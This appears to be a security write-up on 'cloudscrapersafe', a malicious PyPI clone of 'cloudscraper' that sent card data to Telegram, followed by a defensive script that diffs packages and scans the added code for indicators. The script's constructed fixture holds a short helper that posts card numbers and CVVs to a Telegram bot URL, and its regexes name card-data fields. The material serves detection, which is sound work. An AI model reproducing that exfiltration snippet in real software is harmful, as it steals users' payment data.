
Introduction

On July 6, 2025, a suspicious Python package called 'cloudscrapersafe' was uploaded to the Python Package Index (PyPI). Marketed as a utility to evade Cloudflare's anti-bot protections, the package was a modified copy of the widely used 'cloudscraper' library, which automates access to websites protected by Cloudflare's IUAM (I'm Under Attack Mode). Within a few hours it had already been downloaded and potentially deployed in some environments. Thankfully, PyPI swiftly removed the package once it was identified as malicious.

While preserving every original feature of 'cloudscraper', the package secretly embeds logic designed to intercept credit card information and exfiltrate it to an external Telegram bot. It is worth noting that although 'cloudscraper' itself has over 1.4 million downloads and is openly available, its purpose is to circumvent security protections, a use case that already sits in a gray zone. This highlights the risk of developers importing tools that are both legally questionable and technically dangerous, with little scrutiny of what additional payloads they may include.

The attack is a textbook example of supply chain abuse: a malicious actor takes a known open-source library, clones it under a slightly different name, and injects harmful code while preserving the original functionality. The package, 'cloudscrapersafe', retained the scraping and challenge-solving features of 'cloudscraper' but added two specific logic blocks…
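The defensive counterpart to this pattern is to compare a package you are about to install against the upstream release it claims to be, and to look at what was added rather than at the whole code base. The script below is an added example, not code from the original article and not the code of 'cloudscraper' or 'cloudscrapersafe': it diffs two package snapshots (path to source text), isolates files and lines that exist only in the suspect copy, and scans those additions for illustrative indicators (a Telegram bot API URL and card-data field names). The UPSTREAM and CLONE snapshots and the INDICATORS table are constructed for the example and do not reproduce the real package's contents.

```python
import difflib
import re

# Illustrative indicator patterns for code that appears only in the suspect copy.
# These are constructed for the example and are not a complete detection rule set.
INDICATORS = {
    "telegram_bot_api": re.compile(r"api\.telegram\.org/bot", re.I),
    "card_field_keyword": re.compile(r"\b(card[_ ]?number|cvv|cvc|expiry)\b", re.I),
}


def added_lines(original_src, suspect_src):
    """Return the lines present in suspect_src but not in original_src
    (the '+' lines of a zero-context unified diff, minus the '+++' header)."""
    diff = difflib.unified_diff(
        original_src.splitlines(), suspect_src.splitlines(), lineterm="", n=0
    )
    return [l[1:] for l in diff if l.startswith("+") and not l.startswith("+++")]


def diff_packages(original, suspect):
    """Compare two package snapshots (dict: relative path -> source text).
    Reports files only in the suspect, files missing from it, and the lines
    added to files both snapshots share."""
    report = {"added_files": {}, "removed_files": [], "added_lines": {}}
    for path, src in suspect.items():
        if path not in original:
            report["added_files"][path] = src.splitlines()
        else:
            extra = added_lines(original[path], src)
            if extra:
                report["added_lines"][path] = extra
    report["removed_files"] = sorted(p for p in original if p not in suspect)
    return report


def scan_lines(lines):
    """Return (indicator_name, line) pairs for every line matching an indicator."""
    hits = []
    for line in lines:
        for name, pattern in INDICATORS.items():
            if pattern.search(line):
                hits.append((name, line.strip()))
    return hits


def analyze(original, suspect):
    """Diff the snapshots, then scan only the added material for indicators.
    Returns (diff_report, findings) where findings maps path -> list of hits."""
    report = diff_packages(original, suspect)
    findings = {}
    added = list(report["added_files"].items()) + list(report["added_lines"].items())
    for path, lines in added:
        hits = scan_lines(lines)
        if hits:
            findings[path] = hits
    return report, findings


# Constructed snapshots: a minimal "upstream" module and a "clone" that adds one
# import and one extra file. Neither reflects the real packages' code.
UPSTREAM = {
    "cloudscraper/__init__.py": (
        "import requests\n\n"
        "def create_scraper():\n"
        "    return requests.Session()\n"
    ),
}
CLONE = {
    "cloudscraper/__init__.py": (
        "import requests\n"
        "from .helper import forward\n\n"
        "def create_scraper():\n"
        "    return requests.Session()\n"
    ),
    "cloudscraper/helper.py": (
        "import requests\n"
        "TG = 'https://api.telegram.org/bot<TOKEN>/sendMessage'\n"
        "def forward(card_number, cvv):\n"
        "    requests.post(TG, data={'text': card_number + cvv})\n"
    ),
}

if __name__ == "__main__":
    report, findings = analyze(UPSTREAM, CLONE)
    print("added files:", sorted(report["added_files"]))
    print("added lines:", report["added_lines"])
    for path, hits in findings.items():
        for name, line in hits:
            print(f"{path}: [{name}] {line}")
```

In practice the two snapshots would come from unpacking the upstream sdist or wheel and the suspect one (for example with `pip download --no-deps`), and the review would focus on the added files and lines the report surfaces, since that is where a clone like this carries its extra logic while the original functionality stays byte-for-byte intact.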